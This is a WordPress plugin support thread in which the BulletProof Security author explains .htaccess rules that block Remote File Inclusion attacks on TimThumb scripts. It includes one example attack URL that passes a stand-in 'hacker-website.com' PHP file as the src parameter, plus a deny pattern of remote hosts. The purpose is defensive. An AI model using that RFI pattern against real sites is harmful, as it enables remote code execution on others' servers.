Support » Plugin: BulletProof Security » Tim Thumb Code

  • Resolved flyfisher842

    (@flyfisher842)


    I recently purchased a plugin for image manipulation. After purchase I found it uses Tim Thumb code. Is there any way to make TT code safe to run as in a protected mode or something. I looked at the timthump php page and see something about protected. I uninstalled the plugin because security is more important than image manipulation. And my money goes with BPS

    https://wordpress.org/plugins/bulletproof-security/

Viewing 10 replies - 1 through 10 (of 10 total)
  • Plugin Author AITpro

    (@aitpro)

    All new timthumb scripts (as of a couple of years ago and a few versions of timthumb scripts ago) should be safe to use. BPS also includes root .htaccess code to protect timthumb scripts from being exploited. You can also check with the plugin creator of that plugin to ask if the timthumb script is a current version that is not vulnerable/exploitable.

    # TIMTHUMB FORBID RFI and MISC FILE SKIP/BYPASS RULE
    # Use BPS Custom Code to modify/edit/change this code and to save it permanently.
    # Remote File Inclusion (RFI) security rules
    # Note: Only whitelist your additional domains or files if needed - do not whitelist hacker domains or files
    RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
    RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
    RewriteRule .* index.php [F]
    #
    # Example: Whitelist additional misc files: (example\.php|another-file\.php|phpthumb\.php|thumb\.php|thumbs\.php)
    RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
    # Example: Whitelist additional website domains: RewriteCond %{HTTP_REFERER} ^.*(YourWebsite.com|AnotherWebsite.com).*
    RewriteCond %{HTTP_REFERER} ^.*example.com*
    RewriteRule . - [S=1]

    Thanks for the answer. Now to see I can understand it. htaccess code is not my long suite.

    Plugin Author AITpro

    (@aitpro)

    This is standard BPS htaccess code already included in the BPS root .htaccess file and you do not need to do anything to it – it automatically protects your site against any/all RFI attacks. The timthumb vulnerability/exploit/attack that was occurring a while back was an RFI attack – Remote File Inclusion attack.

    The code allows timthumb scripts to be called if the HTTP Referer is your website. If the HTTP Referer is not your website – remote attacker website – then the RFI attack would be blocked.

    Plugin Author AITpro

    (@aitpro)

    The way I commonly see timthumb scripts used is like this:

    Legitimate timthumb script call - The Referer is your website domain:
    http://example.com/blah/timthumb.php?src=http://example.com/do-something-here
    
    Timthumb hack - the Referer is NOT your website domain:
    http://example.com/blah/timthumb.php?src=http://hacker-website.com/hacker-file.php

    Got it. I knew the code was in the htaccess but did not understand what it did. I trusted you to know or it would not have been in there. Thanks for the explanation and examples. This makes it clear what the code stops. And it explains why a screen in the plugin went blank. There is a login screen to a members area in the plugin that went blank the second time I tried it. And is still blank. Could be the plugin but I don’t think so. The site is http://www.youzign.com Some pretty impressive image manipulation. But I think there are some other plugins on the repository that will do as well.

    I would still test this plugin I purchased for quite a while on a throwaway test bed account before putting it on a production site.

    Plugin Author AITpro

    (@aitpro)

    If BPS is blocking anything it will be logged in the BPS Security Log. If the members login area is using the WordPress login page then there could be a direct conflict with BPS Login Security and that plugin’s member login. If that plugin is creating and using it’s own login page then there would probably not be a direct conflict. Typically you can only use one login security plugin at a time since they are doing the same or very similar things and calling the same WordPress Hooks – actions and filters. To confirm or eliminate BPS as having anything to do with the blank page in that plugin do the standard BPS troubleshooting steps below.

    BPS Troubleshooting Steps:
    1. Check your BPS Security Log for any log entries related to that plugin.
    2. Deactivate Root folder BulletProof Mode and test the other plugin.
    3. Turn off BPS Login Security and test the other plugin.

    I am not going to use their plugin. It may be fine but I don’t feel comfortable trusting them. Have asked for a refund and will delete the plugin. It is not worth the risk. Thanks for the help.

    Plugin Author AITpro

    (@aitpro)

    Oh ok. Please resolve this thread then. Thanks.

    Sorry forgot to close it.

    Plugin Author AITpro

    (@aitpro)

    No need to apologize. I was not nailing you or anything. We go into autopilot mode and answer anything that is a question or resembles a question. So our off button = “thread resolved” ha ha ha.

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘Tim Thumb Code’ is closed to new replies.